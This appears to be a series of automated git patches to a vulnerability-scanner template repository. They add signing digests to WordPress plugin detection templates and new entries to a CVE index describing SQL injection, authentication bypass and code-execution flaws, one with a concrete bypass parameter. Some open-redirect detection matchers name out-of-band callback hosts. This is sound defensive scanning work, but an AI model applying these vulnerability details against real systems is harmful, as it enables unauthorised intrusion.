4b0a00483046022100a54aa1120135128c1b6deb515c7a2bf9e9d279ed8fc03caba4d7aafc6dc1d4b6022100ef3953ffa3f115cd2549286a822cae7bb6a06f0d9eb6f8b3bc6e25093b9d8e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..d01c0e45b7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201891ade1c4c8bcab643fc8a9c2126b33a2fb85296a1016f3c9e8e29732497e66022100b82e35113ba537cc15b3bc7886dbf95b57506d2c22ec8a03edd7422518cbf9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..b6e65a2802 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe14a841b70b282aa91ec1cb90df8889b67316974a356200c2fff0195ef7913502207b85eecc380701a50702a9152aeb9e55bdb4bd00f2bfc36ad79543e4e2658888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..55e4504055 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d76ba9c29fd22e390cd1dc6b6637e4aeb4207c6dbda1145f3c111584e08c1512022020b9f2e24c14ef6fe41afbe7ae9432f683f921681c7feda5b3d35fe36c3feb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..41c442ea8b 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056d04f533aeb70f19298af5b94210e048f71e47d37a6d6b0a7e14eac359cf7d50221009ba395fae3faf1e68ef0066ce219b240bb50eb99aa987f8f11dae0d140f6241b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..4d84b83959 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afb6370fb2c25e23426c92c350f17b5e9c1e6922f26234472cbe9e918234064602206161d3c9221c064b8ba29a7c63f69ad1e6d92a2e87be1be1052a0b77a79dfd80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..46bc961f63 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022e26a9f5edeb00b81f2baf7ab7cb3c45f6b27cbb58e71fd62e2da79fb2b125b02201a1e1b63474ade9b0db69bb370fd624b2c2b315cf185d802b81b410a55b70225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..fde9156a1b 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204f519ad84f9f1cedb1d9dc4b7f611ca0808ccbd760d24e858e5ee6ebf6f90530022100e53a6acdba095636439eb80b32fa2a9d670896e7222da9ae66a4a4a7d4842439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..672b633ef3 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3feef35c28392554cdf4cde9cc94ca00441908a620f56436a7bdce5608b831702206f38a95595d44a8743411e254ebb566ac249cdb2b4708784c55630ac5bd955f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..f9208efbbc 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220242948788c07649d5ef9422002d3a126ad9f62a94ecf067b394d3da46ec0e344022100918cc34b925efd68efc9fb7941e4833f9d14253d268e9a044dd83ccf63d8c3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..ea94e50d2a 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220273156852321bb930d037d24a68ca6dfc4cc0dc2a67654666830c4505f4c2bd402206b45310252f79365f761f602bdfeab244f5d15d6e1a9c61f38adc4b7cd40ff3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..4bc9c5162e 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220266cb7cd491ddbfadedc3137368b9dcd802103250507553d706356f0bc78d3c002201d070ddf787e4a0ee82fdb2b80d0ad019c0a2909f93fe825cb92675dca408c06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bb2dd0e564ec6669a31bdabd726f3c4284e92f83 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 13:05:40 +0000 Subject: [PATCH 1681/1841] Auto Generated cves.json [Fri Jul 26 13:05:39 UTC 2024] :robot: --- cves.json | 9 +++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 8a585b2031..889d524255 100644 --- a/cves.json +++ b/cves.json @@ -1824,6 +1824,7 @@ {"ID":"CVE-2022-34093","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via access_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34093.yaml"} {"ID":"CVE-2022-34094","Info":{"Name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","Severity":"medium","Description":"Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34094.yaml"} {"ID":"CVE-2022-34121","Info":{"Name":"CuppaCMS v1.0 - Local File Inclusion","Severity":"high","Description":"Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34121.yaml"} +{"ID":"CVE-2022-34267","Info":{"Name":"RWS WorldServer - Authentication Bypass","Severity":"critical","Description":"An issue was discovered in RWS WorldServer before 11.7.3. Adding a token parameter with the value of 02 bypasses all authentication requirements. Arbitrary Java code can be uploaded and executed via a .jar archive to the ws-api/v2/customizations/api endpoint.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-34267.yaml"} {"ID":"CVE-2022-34328","Info":{"Name":"PMB 7.3.10 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-34328.yaml"} {"ID":"CVE-2022-34534","Info":{"Name":"Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure","Severity":"high","Description":"Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34534.yaml"} {"ID":"CVE-2022-34576","Info":{"Name":"WAVLINK WN535 G3 - Improper Access Control","Severity":"high","Description":"WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-34576.yaml"} @@ -2480,12 +2481,17 @@ {"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-3742","Info":{"Name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","Severity":"high","Description":"Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-3742.yaml"} +{"ID":"CVE-2024-37843","Info":{"Name":"Craft CMS \u003c=v3.7.31 - SQL Injection","Severity":"critical","Description":"Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-37843.yaml"} {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} +{"ID":"CVE-2024-38289","Info":{"Name":"TurboMeeting - Boolean-based SQL Injection","Severity":"critical","Description":"A Boolean-based SQL injection vulnerability in the \"RHUB TurboMeeting\" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38289.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} +{"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"} +{"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"} {"ID":"CVE-2024-40348","Info":{"Name":"Bazarr \u003c 1.4.3 - Arbitrary File Read","Severity":"high","Description":"Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-40348.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"} +{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} {"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the ‘term_id’ parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"} @@ -2493,15 +2499,18 @@ {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"} {"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"} +{"ID":"CVE-2024-4885","Info":{"Name":"Progress Software WhatsUp Gold GetFileWithoutZip Directory Traversal - Remote Code Execution","Severity":"critical","Description":"This vulnerability allows remote attackers to execute arbitrary code on affected installations of Progress Software WhatsUp Gold. Authentication is not required to exploit this vulnerability.\nThe specific flaw exists within the implementation of GetFileWithoutZip method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the service account.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4885.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"} {"ID":"CVE-2024-5217","Info":{"Name":"ServiceNow - Incomplete Input Validation","Severity":"critical","Description":"ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5217.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} +{"ID":"CVE-2024-5315","Info":{"Name":"Dolibarr ERP CMS `list.php` - SQL Injection","Severity":"critical","Description":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-5315.yaml"} {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} {"ID":"CVE-2024-6028","Info":{"Name":"Quiz Maker \u003c= 6.5.8.3 - SQL Injection","Severity":"critical","Description":"The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6028.yaml"} {"ID":"CVE-2024-6188","Info":{"Name":"TrakSYS 11.x.x - Sensitive Data Exposure","Severity":"medium","Description":"A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6188.yaml"} {"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"} +{"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"} {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index e919c96898..66199c8c0f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -1d9a6b1f068eb3bcfb61ecfb71a484fe +ce42dd82b18beb00b48f704ed417a948 From b687877f3d0e09b29d6ab879e2805d1491b8308f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 26 Jul 2024 13:07:14 +0000 Subject: [PATCH 1682/1841] Auto Template Signing [Fri Jul 26 13:07:14 UTC 2024] :robot: --- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-38131.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 2 +- http/exposures/backups/zip-backup-files.yaml | 2 +- http/token-spray/api-scraperbox.yaml | 3 +-- http/token-spray/api-scrapestack.yaml | 3 +-- http/token-spray/api-zenrows.yaml | 3 +-- http/vulnerabilities/other/bitrix-open-redirect.yaml | 2 +- javascript/enumeration/mysql/mysql-default-login.yaml | 2 +- 14 files changed, 14 insertions(+), 17 deletions(-) diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 11965dd707..74015fb733 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -47,4 +47,4 @@ http: words: - "self.location = 'http://oast.me'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'" -# digest: 4a0a00473045022100ef42faf462b056809e87c56a2bd991601c0d4b37f9b1b0aa4e16c58a0cc1762802204ecf6513868b5bb6ce9f8b4a830ded2d3c2a660d9e27255179622995bacbc87e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d85cc715ee10b394f1a5d50cb7a011d10165630dc8d96854e7989659770316eb02204db7f3e1f18c9f24ba6d315cf87e2a27ee1ea1d3963c26fc67cfa9a13c7abb1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 72a743d2bd..2edd32177c 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502206d5139608b72b6f1bc8113be66f7f9ef151af099ff74bd9a595fbe88734f52ae022100e4b539eca28305c2bfd5fa8b99eaa4c9f56de7cfc1103aa3c2acba9d4ebcf7c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa9f7406e49f1baf7c15d486f0b5155f284d9d677d8dad74fa50da1b878fd22022075cca9dd5a001d381d2c43ce94d693b1b87a4b47a43eb90d4bcd4a4f0c6be5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index f317288c1a..9e3163229f 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and -# digest: 4b0a00483046022100b0745427434292ab72e2d5edeba4a29bea7509eec4aa3484ecbb37faa46d42fc022100dd3a287ead57d36282eddb6ecb7bc9d9159c4f8f35e013e8b08eab4f3bf0ad8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a667e41a338568765d9f7aa1f4bdaba5ba1fe329f7e76d1604f88b8b15c86300220781f39a95fdbf7a898f37621269bdffe2dc51e93cfba278a4a03db4d358afdff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index f4276830ae..02cd3941ad 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -106,4 +106,4 @@ http: - //*[@id="fusion-form-nonce-0"] attribute: value part: body_1 -# digest: 4a0a00473045022100d4d7286bb2adc3747133eb17cef30058b38c90b81a522b6d40888b196148602802201c20abf7e57ccc02665f3556f2f80a639366612848b0a085194af92f7e30f9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 